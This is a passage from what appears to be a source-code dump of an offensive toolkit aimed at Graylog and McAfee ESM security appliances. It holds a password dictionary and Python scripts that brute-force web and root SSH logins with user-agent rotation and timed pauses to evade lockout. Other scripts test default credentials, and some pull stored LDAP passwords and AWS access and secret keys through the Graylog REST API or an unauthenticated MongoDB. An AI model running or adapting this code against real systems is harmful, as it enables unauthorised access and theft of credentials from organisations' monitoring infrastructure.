47 | files.close() 48 | 49 | if not bruteforcesuccesfull: 50 | globals.messages(8) 51 | 52 | # %%%%%%%%%% The End %%%%%%%%%%# 53 | -------------------------------------------------------------------------------- /graylog/dict.txt: -------------------------------------------------------------------------------- 1 | admin 2 | graylog 3 | Graylog 4 | GRAYLOG 5 | Gr4yl0g 6 | gr4yl0g 7 | ubuntu 8 | changeme 9 | graylog123 10 | graylog1 11 | graylog2 12 | graylog3 13 | graylog4 14 | graylog5 15 | graylog6 16 | graylog7 17 | graylog8 18 | graylog9 19 | graylog0 20 | graylog! 21 | graylog@ 22 | graylog# 23 | graylog$ 24 | graylog% 25 | graylog^ 26 | graylog& 27 | graylog* 28 | graylog? 29 | Graylog1 30 | Graylog2 31 | Graylog3 32 | Graylog4 33 | Graylog5 34 | Graylog6 35 | Graylog7 36 | Graylog8 37 | Graylog9 38 | Graylog0 39 | Graylog! 40 | Graylog@ 41 | Graylog# 42 | Graylog$ 43 | Graylog% 44 | Graylog^ 45 | Graylog& 46 | Graylog* 47 | Graylog? 48 | 6raylog1 49 | 6raylog2 50 | 6raylog3 51 | 6raylog4 52 | 6raylog5 53 | 6raylog6 54 | 6raylog7 55 | 6raylog8 56 | 6raylog9 57 | 6raylog0 58 | 6raylog! 59 | 6raylog@ 60 | 6raylog# 61 | 6raylog$ 62 | 6raylog% 63 | 6raylog^ 64 | 6raylog& 65 | 6raylog* 66 | 6raylog? 67 | 9raylog1 68 | 9raylog2 69 | 9raylog3 70 | 9raylog4 71 | 9raylog5 72 | 9raylog6 73 | 9raylog7 74 | 9raylog8 75 | 9raylog9 76 | 9raylog0 77 | 9raylog! 78 | 9raylog@ 79 | 9raylog# 80 | 9raylog$ 81 | 9raylog% 82 | 9raylog^ 83 | 9raylog& 84 | 9raylog* 85 | 9raylog? 86 | gRAYLOG1 87 | gRAYLOG2 88 | gRAYLOG3 89 | gRAYLOG4 90 | gRAYLOG5 91 | gRAYLOG6 92 | gRAYLOG7 93 | gRAYLOG8 94 | gRAYLOG9 95 | gRAYLOG0 96 | gRAYLOG! 97 | gRAYLOG@ 98 | gRAYLOG# 99 | gRAYLOG$ 100 | gRAYLOG% 101 | gRAYLOG^ 102 | gRAYLOG& 103 | gRAYLOG* 104 | gRAYLOG? 105 | GRAYLOG1 106 | GRAYLOG2 107 | GRAYLOG3 108 | GRAYLOG4 109 | GRAYLOG5 110 | GRAYLOG6 111 | GRAYLOG7 112 | GRAYLOG8 113 | GRAYLOG9 114 | GRAYLOG0 115 | GRAYLOG! 116 | GRAYLOG@ 117 | GRAYLOG# 118 | GRAYLOG$ 119 | GRAYLOG% 120 | GRAYLOG^ 121 | GRAYLOG& 122 | GRAYLOG* 123 | GRAYLOG? 124 | 6RAYLOG1 125 | 6RAYLOG2 126 | 6RAYLOG3 127 | 6RAYLOG4 128 | 6RAYLOG5 129 | 6RAYLOG6 130 | 6RAYLOG7 131 | 6RAYLOG8 132 | 6RAYLOG9 133 | 6RAYLOG0 134 | 6RAYLOG! 135 | 6RAYLOG@ 136 | 6RAYLOG# 137 | 6RAYLOG$ 138 | 6RAYLOG% 139 | 6RAYLOG^ 140 | 6RAYLOG& 141 | 6RAYLOG* 142 | 6RAYLOG? 143 | 9RAYLOG1 144 | 9RAYLOG2 145 | 9RAYLOG3 146 | 9RAYLOG4 147 | 9RAYLOG5 148 | 9RAYLOG6 149 | 9RAYLOG7 150 | 9RAYLOG8 151 | 9RAYLOG9 152 | 9RAYLOG0 153 | 9RAYLOG! 154 | 9RAYLOG@ 155 | 9RAYLOG# 156 | 9RAYLOG$ 157 | 9RAYLOG% 158 | 9RAYLOG^ 159 | 9RAYLOG& 160 | 9RAYLOG* 161 | 9RAYLOG? 162 | graylog11 163 | graylog12 164 | graylog13 165 | graylog14 166 | graylog15 167 | graylog16 168 | graylog17 169 | graylog18 170 | graylog19 171 | graylog10 172 | graylog1! 173 | graylog1@ 174 | graylog1# 175 | graylog1$ 176 | graylog1% 177 | graylog1^ 178 | graylog1& 179 | graylog1* 180 | graylog1? 181 | Graylog11 182 | Graylog12 183 | Graylog13 184 | Graylog14 185 | Graylog15 186 | Graylog16 187 | Graylog17 188 | Graylog18 189 | Graylog19 190 | Graylog10 191 | Graylog1! 192 | Graylog1@ 193 | Graylog1# 194 | Graylog1$ 195 | Graylog1% 196 | Graylog1^ 197 | Graylog1& 198 | Graylog1* 199 | Graylog1? 200 | 6raylog11 201 | 6raylog12 202 | 6raylog13 203 | 6raylog14 204 | 6raylog15 205 | 6raylog16 206 | 6raylog17 207 | 6raylog18 208 | 6raylog19 209 | 6raylog10 210 | 6raylog1! 211 | 6raylog1@ 212 | 6raylog1# 213 | 6raylog1$ 214 | 6raylog1% 215 | 6raylog1^ 216 | 6raylog1& 217 | 6raylog1* 218 | 6raylog1? 219 | 9raylog11 220 | 9raylog12 221 | 9raylog13 222 | 9raylog14 223 | 9raylog15 224 | 9raylog16 225 | 9raylog17 226 | 9raylog18 227 | 9raylog19 228 | 9raylog10 229 | 9raylog1! 230 | 9raylog1@ 231 | 9raylog1# 232 | 9raylog1$ 233 | 9raylog1% 234 | 9raylog1^ 235 | 9raylog1& 236 | 9raylog1* 237 | 9raylog1? 238 | graylog121 239 | graylog122 240 | graylog123 241 | graylog124 242 | graylog125 243 | graylog126 244 | graylog127 245 | graylog128 246 | graylog129 247 | graylog120 248 | graylog12! 249 | graylog12@ 250 | graylog12# 251 | graylog12$ 252 | graylog12% 253 | graylog12^ 254 | graylog12& 255 | graylog12* 256 | graylog12? 257 | Graylog121 258 | Graylog122 259 | Graylog123 260 | Graylog124 261 | Graylog125 262 | Graylog126 263 | Graylog127 264 | Graylog128 265 | Graylog129 266 | Graylog120 267 | Graylog12! 268 | Graylog12@ 269 | Graylog12# 270 | Graylog12$ 271 | Graylog12% 272 | Graylog12^ 273 | Graylog12& 274 | Graylog12* 275 | Graylog12? 276 | 6raylog121 277 | 6raylog122 278 | 6raylog123 279 | 6raylog124 280 | 6raylog125 281 | 6raylog126 282 | 6raylog127 283 | 6raylog128 284 | 6raylog129 285 | 6raylog120 286 | 6raylog12! 287 | 6raylog12@ 288 | 6raylog12# 289 | 6raylog12$ 290 | 6raylog12% 291 | 6raylog12^ 292 | 6raylog12& 293 | 6raylog12* 294 | 6raylog12? 295 | 9raylog121 296 | 9raylog122 297 | 9raylog123 298 | 9raylog124 299 | 9raylog125 300 | 9raylog126 301 | 9raylog127 302 | 9raylog128 303 | 9raylog129 304 | 9raylog120 305 | 9raylog12! 306 | 9raylog12@ 307 | 9raylog12# 308 | 9raylog12$ 309 | 9raylog12% 310 | 9raylog12^ 311 | 9raylog12& 312 | 9raylog12* 313 | 9raylog12? 314 | graylog1231 315 | graylog1232 316 | graylog1233 317 | graylog1234 318 | graylog1235 319 | graylog1236 320 | graylog1237 321 | graylog1238 322 | graylog1239 323 | graylog1230 324 | graylog123! 325 | graylog123@ 326 | graylog123# 327 | graylog123$ 328 | graylog123% 329 | graylog123^ 330 | graylog123& 331 | graylog123* 332 | graylog123? 333 | Graylog1231 334 | Graylog1232 335 | Graylog1233 336 | Graylog1234 337 | Graylog1235 338 | Graylog1236 339 | Graylog1237 340 | Graylog1238 341 | Graylog1239 342 | Graylog1230 343 | Graylog123! 344 | Graylog123@ 345 | Graylog123# 346 | Graylog123$ 347 | Graylog123% 348 | Graylog123^ 349 | Graylog123& 350 | Graylog123* 351 | Graylog123? 352 | 6raylog1231 353 | 6raylog1232 354 | 6raylog1233 355 | 6raylog1234 356 | 6raylog1235 357 | 6raylog1236 358 | 6raylog1237 359 | 6raylog1238 360 | 6raylog1239 361 | 6raylog1230 362 | 6raylog123! 363 | 6raylog123@ 364 | 6raylog123# 365 | 6raylog123$ 366 | 6raylog123% 367 | 6raylog123^ 368 | 6raylog123& 369 | 6raylog123* 370 | 6raylog123? 371 | 9raylog1231 372 | 9raylog1232 373 | 9raylog1233 374 | 9raylog1234 375 | 9raylog1235 376 | 9raylog1236 377 | 9raylog1237 378 | 9raylog1238 379 | 9raylog1239 380 | 9raylog1230 381 | 9raylog123! 382 | 9raylog123@ 383 | 9raylog123# 384 | 9raylog123$ 385 | 9raylog123% 386 | 9raylog123^ 387 | 9raylog123& 388 | 9raylog123* 389 | 9raylog123? 390 | biteme 391 | 1992 392 | london 393 | soccer 394 | william 395 | querty 396 | liverpool 397 | pussy 398 | admin123 399 | whatever 400 | dallas 401 | hockey 402 | test 403 | zaq1zaq1 404 | 1q2w3e 405 | aaaaaa 406 | killer 407 | bandit 408 | ashley 409 | cookie 410 | merlin 411 | trustno1 412 | 1991 413 | ranger 414 | chelsea 415 | banana 416 | jennifer 417 | 1990 418 | amanda 419 | 1989 420 | hunter 421 | nicole 422 | hello 423 | maverick 424 | blahblah 425 | mercedes 426 | corvette 427 | computer 428 | cheese 429 | ferrari 430 | starwars 431 | 1qaz2wsx 432 | andrea 433 | lakers 434 | andrew 435 | 12341234 436 | matthew 437 | robert 438 | 1234 439 | sophie 440 | pepper 441 | joshua 442 | tigger 443 | 55555 444 | jordan 445 | solo 446 | abcdef 447 | letmein 448 | ginger 449 | jessica 450 | 222222 451 | harley 452 | george 453 | summer 454 | thomas 455 | hannah 456 | daniel 457 | buster 458 | baseball 459 | passw0rd 460 | shadow 461 | freedom 462 | bailey 463 | 121212 464 | zxcvbnm 465 | qwerty123 466 | password1 467 | donald 468 | aa123456 469 | charlie 470 | !@#$%^&* 471 | 654321 472 | monkey 473 | 123123 474 | football 475 | abc123 476 | 666666 477 | welcome 478 | admin 479 | princess 480 | iloveyou 481 | qwerty 482 | sunshine 483 | 1234567 484 | 111111 485 | 12345 486 | 12345678 487 | 123456789 488 | password 489 | 123456 490 | admin1 491 | admin2 492 | admin3 493 | admin4 494 | admin5 495 | admin6 496 | admin7 497 | admin8 498 | admin9 499 | admin0 500 | admin! 501 | admin@ 502 | admin# 503 | admin$ 504 | admin% 505 | admin^ 506 | admin& 507 | admin* 508 | admin? 509 | Admin1 510 | Admin2 511 | Admin3 512 | Admin4 513 | Admin5 514 | Admin6 515 | Admin7 516 | Admin8 517 | Admin9 518 | Admin0 519 | Admin! 520 | Admin@ 521 | Admin# 522 | Admin$ 523 | Admin% 524 | Admin^ 525 | Admin& 526 | Admin* 527 | Admin? 528 | @dmin1 529 | @dmin2 530 | @dmin3 531 | @dmin4 532 | @dmin5 533 | @dmin6 534 | @dmin7 535 | @dmin8 536 | @dmin9 537 | @dmin0 538 | @dmin! 539 | @dmin@ 540 | @dmin# 541 | @dmin$ 542 | @dmin% 543 | @dmin^ 544 | @dmin& 545 | @dmin* 546 | @dmin? 547 | 4dmin1 548 | 4dmin2 549 | 4dmin3 550 | 4dmin4 551 | 4dmin5 552 | 4dmin6 553 | 4dmin7 554 | 4dmin8 555 | 4dmin9 556 | 4dmin0 557 | 4dmin! 558 | 4dmin@ 559 | 4dmin# 560 | 4dmin$ 561 | 4dmin% 562 | 4dmin^ 563 | 4dmin& 564 | 4dmin* 565 | 4dmin? 566 | admin1231 567 | admin1232 568 | admin1233 569 | admin1234 570 | admin1235 571 | admin1236 572 | admin1237 573 | admin1238 574 | admin1239 575 | admin1230 576 | admin123! 577 | admin123@ 578 | admin123# 579 | admin123$ 580 | admin123% 581 | admin123^ 582 | admin123& 583 | admin123* 584 | admin123? 585 | Admin1231 586 | Admin1232 587 | Admin1233 588 | Admin1234 589 | Admin1235 590 | Admin1236 591 | Admin1237 592 | Admin1238 593 | Admin1239 594 | Admin1230 595 | Admin123! 596 | Admin123@ 597 | Admin123# 598 | Admin123$ 599 | Admin123% 600 | Admin123^ 601 | Admin123& 602 | Admin123* 603 | Admin123? 604 | @dmin1231 605 | @dmin1232 606 | @dmin1233 607 | @dmin1234 608 | @dmin1235 609 | @dmin1236 610 | @dmin1237 611 | @dmin1238 612 | @dmin1239 613 | @dmin1230 614 | @dmin123! 615 | @dmin123@ 616 | @dmin123# 617 | @dmin123$ 618 | @dmin123% 619 | @dmin123^ 620 | @dmin123& 621 | @dmin123* 622 | @dmin123? 623 | 4dmin1231 624 | 4dmin1232 625 | 4dmin1233 626 | 4dmin1234 627 | 4dmin1235 628 | 4dmin1236 629 | 4dmin1237 630 | 4dmin1238 631 | 4dmin1239 632 | 4dmin1230 633 | 4dmin123! 634 | 4dmin123@ 635 | 4dmin123# 636 | 4dmin123$ 637 | 4dmin123% 638 | 4dmin123^ 639 | 4dmin123& 640 | 4dmin123* 641 | 4dmin123? 642 | gr4yl0g1 643 | gr4yl0g2 644 | gr4yl0g3 645 | gr4yl0g4 646 | gr4yl0g5 647 | gr4yl0g6 648 | gr4yl0g7 649 | gr4yl0g8 650 | gr4yl0g9 651 | gr4yl0g0 652 | gr4yl0g! 653 | gr4yl0g@ 654 | gr4yl0g# 655 | gr4yl0g$ 656 | gr4yl0g% 657 | gr4yl0g^ 658 | gr4yl0g& 659 | gr4yl0g* 660 | gr4yl0g? 661 | Gr4yl0g1 662 | Gr4yl0g2 663 | Gr4yl0g3 664 | Gr4yl0g4 665 | Gr4yl0g5 666 | Gr4yl0g6 667 | Gr4yl0g7 668 | Gr4yl0g8 669 | Gr4yl0g9 670 | Gr4yl0g0 671 | Gr4yl0g! 672 | Gr4yl0g@ 673 | Gr4yl0g# 674 | Gr4yl0g$ 675 | Gr4yl0g% 676 | Gr4yl0g^ 677 | Gr4yl0g& 678 | Gr4yl0g* 679 | Gr4yl0g? 680 | 6r4yl0g1 681 | 6r4yl0g2 682 | 6r4yl0g3 683 | 6r4yl0g4 684 | 6r4yl0g5 685 | 6r4yl0g6 686 | 6r4yl0g7 687 | 6r4yl0g8 688 | 6r4yl0g9 689 | 6r4yl0g0 690 | 6r4yl0g! 691 | 6r4yl0g@ 692 | 6r4yl0g# 693 | 6r4yl0g$ 694 | 6r4yl0g% 695 | 6r4yl0g^ 696 | 6r4yl0g& 697 | 6r4yl0g* 698 | 6r4yl0g? 699 | 9r4yl0g1 700 | 9r4yl0g2 701 | 9r4yl0g3 702 | 9r4yl0g4 703 | 9r4yl0g5 704 | 9r4yl0g6 705 | 9r4yl0g7 706 | 9r4yl0g8 707 | 9r4yl0g9 708 | 9r4yl0g0 709 | 9r4yl0g! 710 | 9r4yl0g@ 711 | 9r4yl0g# 712 | 9r4yl0g$ 713 | 9r4yl0g% 714 | 9r4yl0g^ 715 | 9r4yl0g& 716 | 9r4yl0g* 717 | 9r4yl0g? 718 | admin121 719 | admin122 720 | admin123 721 | admin124 722 | admin125 723 | admin126 724 | admin127 725 | admin128 726 | admin129 727 | admin120 728 | admin12! 729 | admin12@ 730 | admin12# 731 | admin12$ 732 | admin12% 733 | admin12^ 734 | admin12& 735 | admin12* 736 | admin12? 737 | Admin121 738 | Admin122 739 | Admin123 740 | Admin124 741 | Admin125 742 | Admin126 743 | Admin127 744 | Admin128 745 | Admin129 746 | Admin120 747 | Admin12! 748 | Admin12@ 749 | Admin12# 750 | Admin12$ 751 | Admin12% 752 | Admin12^ 753 | Admin12& 754 | Admin12* 755 | Admin12? 756 | @dmin121 757 | @dmin122 758 | @dmin123 759 | @dmin124 760 | @dmin125 761 | @dmin126 762 | @dmin127 763 | @dmin128 764 | @dmin129 765 | @dmin120 766 | @dmin12! 767 | @dmin12@ 768 | @dmin12# 769 | @dmin12$ 770 | @dmin12% 771 | @dmin12^ 772 | @dmin12& 773 | @dmin12* 774 | @dmin12? 775 | 4dmin121 776 | 4dmin122 777 | 4dmin123 778 | 4dmin124 779 | 4dmin125 780 | 4dmin126 781 | 4dmin127 782 | 4dmin128 783 | 4dmin129 784 | 4dmin120 785 | 4dmin12! 786 | 4dmin12@ 787 | 4dmin12# 788 | 4dmin12$ 789 | 4dmin12% 790 | 4dmin12^ 791 | 4dmin12& 792 | 4dmin12* 793 | 4dmin12? -------------------------------------------------------------------------------- /graylog/obtaincredentialsrestapi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Graylog Obtain Stored Credentials via REST API 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | 8 | import getpass 9 | import logging 10 | import urllib3 11 | import globals 12 | import colorama 13 | import requests 14 | 15 | from colorama import Fore 16 | from colorama import Style 17 | from requests.auth import HTTPBasicAuth 18 | 19 | colorama.init() 20 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 21 | 22 | # %%%%%%%%%% Functions %%%%%%%%%# 23 | 24 | 25 | def obtain_ldap_credentials(ip, port): 26 | 27 | ldapurl = globals.http + ip + ":" + str( 28 | port) + "/api/system/ldap/settings?pretty=true" 29 | awspluginurl = globals.http + ip + ":" + str( 30 | port) + "/api/system/cluster_config/org.graylog.aws.config.AWSPluginConfiguration?pretty=true" 31 | headers = {'Accept': 'application/json'} 32 | graylogpass = getpass.getpass( 33 | Fore.CYAN + Style.BRIGHT + "[!] Enter Graylog Admin Password: " + 34 | Style.RESET_ALL) 35 | 36 | try: 37 | response = requests.get(ldapurl, auth=HTTPBasicAuth('admin', graylogpass)) 38 | 39 | if response.status_code == 200 and "DOCTYPE html" not in response.text: 40 | globals.graylog_messages(1) 41 | print(response.text.strip('{}').replace('\n', '\n[!]')) 42 | else: 43 | globals.graylog_messages(2) 44 | 45 | except Exception as e: 46 | logging.error(e, exc_info=True) 47 | 48 | try: 49 | response = requests.get( 50 | awspluginurl, auth=HTTPBasicAuth( 51 | 'admin', graylogpass), headers=headers) 52 | 53 | if response.status_code == 200 and "DOCTYPE html" not in response.text: 54 | globals.graylog_messages(3) 55 | print(response.text.strip('{}').replace('\n', '\n[!]')) 56 | else: 57 | globals.graylog_messages(4) 58 | 59 | except Exception as e: 60 | logging.error(e, exc_info=True) 61 | 62 | # %%%%%%%%%% The End %%%%%%%%%%# 63 | -------------------------------------------------------------------------------- /graylog/obtaininputsrestapi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Graylog Obtain Credentials from Inputs 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import getpass 8 | import globals 9 | import logging 10 | import urllib3 11 | import requests 12 | import colorama 13 | 14 | from colorama import Fore 15 | from colorama import Style 16 | from requests.auth import HTTPBasicAuth 17 | 18 | 19 | colorama.init() 20 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 21 | 22 | # %%%%%%%%%% Functions %%%%%%%%%# 23 | 24 | 25 | def obtain_inputs(ip, port): 26 | 27 | inputsurl = globals.http + ip + ":" + str( 28 | port) + "/api/system/inputs?pretty=true" 29 | graylogpass = getpass.getpass( 30 | Fore.CYAN + Style.BRIGHT + "[!] Enter Graylog Admin Password: " + 31 | Style.RESET_ALL) 32 | 33 | try: 34 | response = requests.get( 35 | inputsurl, auth=HTTPBasicAuth('admin', graylogpass)) 36 | 37 | if response.status_code == 200 and "DOCTYPE html" not in response.text: 38 | globals.graylog_messages(5) 39 | data = response.json() 40 | inputs = data['inputs'] 41 | 42 | for x in inputs: 43 | attributes = x['attributes'] 44 | 45 | if ('password' or 'secret') in str(attributes): 46 | print(globals.SEPARATOR) 47 | print("[!] " + str(x['title'])) 48 | print(globals.SEPARATOR) 49 | for y in attributes: 50 | if ('password' or 'secret') in str(y): 51 | print(Fore.RED + Style.BRIGHT + "[!] " + str( 52 | y) + ": " + str(attributes[y]) + Style.RESET_ALL) 53 | else: 54 | print("[!] " + str(y) + ": " + str(attributes[y])) 55 | else: 56 | globals.graylog_messages(6) 57 | 58 | except Exception as e: 59 | logging.error(e, exc_info=True) 60 | 61 | # %%%%%%%%%% The End %%%%%%%%%%# 62 | -------------------------------------------------------------------------------- /graylog/obtainmongodbcredentials.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Graylog Test Connection to MongoDB without 4 | # Authentication and Read Sensitive Information 5 | 6 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 7 | 8 | import nmap 9 | import logging 10 | import globals 11 | 12 | from pymongo import MongoClient 13 | from pymongo.errors import ConnectionFailure 14 | 15 | 16 | # %%%%%%%%%%% Constants %%%%%%%%%%%# 17 | 18 | MONGODB_PORT = 27017 19 | 20 | # %%%%%%%%%% Functions %%%%%%%%%# 21 | 22 | 23 | def test_mongo_credentials(ip): 24 | 25 | nm = nmap.PortScanner() 26 | 27 | try: 28 | nm.scan(hosts=ip, arguments='-sT -T4 -p 27017') 29 | 30 | if nm[ip]['tcp'][MONGODB_PORT]['state'] == 'open': 31 | 32 | try: 33 | client = MongoClient(ip, MONGODB_PORT) 34 | db = client.graylog 35 | globals.graylog_messages(7) 36 | 37 | print("[!] " + (str(list(db.ldap_settings.find({}, { 38 | 'system_username': 1, '_id': 0})))).strip(' [{}]')) 39 | print("[!] " + (str(list(db.ldap_settings.find({}, { 40 | 'system_password': 1, '_id': 0})))).strip(' [{}]')) 41 | print("[!] " + (str(list(db.ldap_settings.find({}, { 42 | 'system_password_salt': 1, '_id': 0})))).strip(' [{}]')) 43 | print("[!] " + (str(list(db.ldap_settings.find({}, { 44 | 'ldap_uri': 1, '_id': 0})))).strip(' [{}]')) 45 | 46 | globals.graylog_messages(8) 47 | 48 | awsaccesskey = list( 49 | db.cluster_config.find({ 50 | 'type': 'org.graylog.aws.config.AWSPluginConfiguration'}, 51 | {'payload.access_key': 1, '_id': 0})) 52 | accesskey = str(awsaccesskey).replace( 53 | 'payload', '').strip('[{}]').replace("'': {", '') 54 | awssecretkey = list( 55 | db.cluster_config.find({ 56 | 'type': 'org.graylog.aws.config.AWSPluginConfiguration'}, 57 | {'payload.secret_key': 1, '_id': 0})) 58 | secretkey = str(awssecretkey).replace( 59 | 'payload', '').strip('[{}]').replace("'': {", '') 60 | 61 | globals.graylog_messages(9) 62 | print("[!] " + accesskey) 63 | print("[!] " + secretkey) 64 | print(globals.SEPARATOR) 65 | 66 | except ConnectionFailure: 67 | globals.graylog_messages(10) 68 | 69 | else: 70 | globals.graylog_messages(11) 71 | 72 | except Exception as e: 73 | logging.error(e, exc_info=True) 74 | 75 | # %%%%%%%%%% The End %%%%%%%%%%# 76 | -------------------------------------------------------------------------------- /graylog/testcredentialsgraylog.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Graylog Tes Default OVA/AMI Credentials Web: admin/admin SSH: ubuntu/ubuntu 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import globals 8 | import logging 9 | import paramiko 10 | import requests 11 | 12 | 13 | # %%%%%%%%%% Functions %%%%%%%%%# 14 | 15 | 16 | def default_web_credentials(ip, port): 17 | 18 | url = globals.http + ip + ":" + str(port) + "/api/system/sessions" 19 | # default web interface credentials 20 | params = { 21 | 'username': 'admin', 22 | 'password': 'admin', 23 | 'host': ip 24 | } 25 | headers = {'X-Requested-By': 'XMLHttpRequest'} 26 | 27 | try: 28 | response = requests.post(url, json=params, 29 | headers=headers, verify=False) 30 | 31 | if response.status_code == 200: 32 | globals.graylog_messages(12) 33 | mess = ['admin', 'admin'] 34 | globals.messages(9, mess) 35 | else: 36 | globals.graylog_messages(13) 37 | 38 | except Exception as e: 39 | logging.error(e, exc_info=True) 40 | 41 | 42 | def default_ssh_credentials(ip): 43 | 44 | ssh = paramiko.SSHClient() 45 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 46 | 47 | try: 48 | ssh.connect(ip, username='ubuntu', password='ubuntu') 49 | globals.graylog_messages(14) 50 | mess = ['ubuntu', 'ubuntu'] 51 | globals.messages(9, mess) 52 | except paramiko.AuthenticationException: 53 | globals.graylog_messages(15) 54 | 55 | # %%%%%%%%%% The End %%%%%%%%%%# 56 | -------------------------------------------------------------------------------- /mcafee/bruteforcemcafee.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # McAfee Login Bruteforce 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import os 8 | import json 9 | import time 10 | import base64 11 | import logging 12 | import globals 13 | import requests 14 | 15 | # %%%%%%%%%% Functions %%%%%%%%%# 16 | 17 | 18 | def mcafee_brute(ip, port): 19 | __location__ = os.path.realpath( 20 | os.path.join(os.getcwd(), os.path.dirname(__file__))) 21 | file = open(os.path.join(__location__, 'dict.txt')) 22 | bruteforcesuccesfull = 0 23 | https = "https://" 24 | 25 | agents = [ 26 | 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,' 27 | ' like Gecko) Chrome/79.0.3945.88 Safari/537.36', 28 | 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/47.0', 29 | 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/42.0', 30 | 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,' 31 | ' like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41' 32 | ] 33 | a = 0 34 | 35 | for line in file: 36 | 37 | password = line.strip('\n\r') 38 | url1 = https + ip + ":" + str(port) + "/ess" 39 | url2 = https + ip + ":" + str(port) + "/rs/esm/v2/login" 40 | headers = { 41 | 'Accept': 'application/json,text/plain,*/*', 42 | 'DNT': '1', 43 | 'Host': ip, 44 | 'Origin': 'https://' + ip, 45 | 'Referer': 'https://' + ip, 46 | 'User-Agent': agents[a], 47 | 'Content-Type': 'application/json;charset=utf-8', 48 | 'Connection': 'keep - alive', 49 | 'X-Xsrf-Token': 'null' 50 | } 51 | 52 | params = { 53 | 'username': 'TkdDUA==', 54 | 'password': str(base64.b64encode(password.encode('utf-8')), 'utf-8'), 55 | 'locale': 'en_US', 56 | 'os': "Linux x86_64" 57 | } 58 | json_params = json.dumps(params).encode('utf-8') 59 | 60 | try: 61 | response = requests.post( 62 | url1, data='Request=API%13CAC%5FLOGIN%13%14', 63 | headers=headers, verify=False) 64 | 65 | if response.status_code == 200: 66 | headers['Accept'] = 'application/json' 67 | response2 = requests.post( 68 | url2, data=json_params, headers=headers, verify=False) 69 | if response2.status_code == 201: 70 | globals.messages(7) 71 | mess = ['NGCP', password] 72 | globals.messages(9, mess) 73 | bruteforcesuccesfull = 1 74 | break 75 | else: 76 | if a <= 2: 77 | a += 1 78 | else: 79 | time.sleep(360) 80 | a = 0 81 | 82 | except Exception as e: 83 | logging.error(e, exc_info=True) 84 | 85 | if not bruteforcesuccesfull: 86 | globals.messages(8) 87 | 88 | # %%%%%%%%%% The End %%%%%%%%%%# 89 | -------------------------------------------------------------------------------- /mcafee/bruteforcessh.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # McAfee SSH Bruteforce 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import os 8 | import nmap 9 | import logging 10 | import globals 11 | import paramiko 12 | 13 | # %%%%%%%%%% Functions %%%%%%%%%# 14 | 15 | 16 | def mcafee_ssh_brute(ip): 17 | __location__ = os.path.realpath( 18 | os.path.join(os.getcwd(), os.path.dirname(__file__))) 19 | file = open(os.path.join(__location__, 'dict.txt')) 20 | nm = nmap.PortScanner() 21 | bps = 0 22 | 23 | try: 24 | nm.scan(hosts=ip, arguments='-sT -T4 -p 22') 25 | if nm[ip]['tcp'][22]['state'] == 'open': 26 | for line in file: 27 | password = line.strip('\n\r') 28 | if ssh_credentials(ip, password): 29 | mess = ['root', password] 30 | globals.messages(7) 31 | globals.messages(9, mess) 32 | file.close() 33 | bps = 1 34 | break 35 | if bps == 0: 36 | globals.messages(8) 37 | file.close() 38 | else: 39 | globals.messages(8) 40 | file.close() 41 | 42 | except Exception as e: 43 | globals.messages(8) 44 | file.close() 45 | logging.error(e, exc_info=True) 46 | 47 | 48 | def ssh_credentials(ip, password): 49 | ssh = paramiko.SSHClient() 50 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 51 | try: 52 | ssh.connect(ip, username='root', password=password, 53 | banner_timeout=2000) 54 | return True 55 | except paramiko.AuthenticationException: 56 | return False 57 | -------------------------------------------------------------------------------- /mcafee/obtainsysteminfo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain system info of McAfee with SSH 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import globals 8 | import paramiko 9 | 10 | from colorama import Fore 11 | from colorama import Style 12 | 13 | 14 | # %%%%%%%%%% Functions %%%%%%%%%# 15 | 16 | 17 | def mcafee_ssh_info(ip): 18 | password = input(Fore.CYAN + Style.NORMAL + 19 | "[!] Enter McAfee root's password: " + Style.RESET_ALL) 20 | 21 | ssh = paramiko.SSHClient() 22 | ssh.load_system_host_keys() 23 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 24 | try: 25 | ssh.connect(ip, username='root', password=password, 26 | banner_timeout=200) 27 | globals.mcafee_messages(1) 28 | 29 | commands = [ 30 | ("hostname", "[!] Hostname"), 31 | ("chkconfig --list | grep \'5:on\' | awk \'{print $1}\'", 32 | "[!] Active Service"), 33 | ("ifconfig", "[!] Network Configuration"), 34 | ("iptables -nL", "[!] FW Configuration") 35 | ] 36 | 37 | for command in commands: 38 | std, stdout, stderr = ssh.exec_command(command[0]) 39 | if stdout != "": 40 | print(Fore.GREEN + Style.NORMAL + command[1]) 41 | print(Fore.GREEN + Style.NORMAL + globals.SEPARATOR 42 | + Style.RESET_ALL) 43 | for i in stdout.readlines(): 44 | print('[!] ' + i.replace('\n', '')) 45 | 46 | ssh.close() 47 | 48 | except paramiko.AuthenticationException: 49 | globals.messages(10) 50 | ssh.close() 51 | 52 | # %%%%%%%%%% The End %%%%%%%%%%# 53 | -------------------------------------------------------------------------------- /mcafee/obtainuserssystem.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain system info of McAfee with SSH 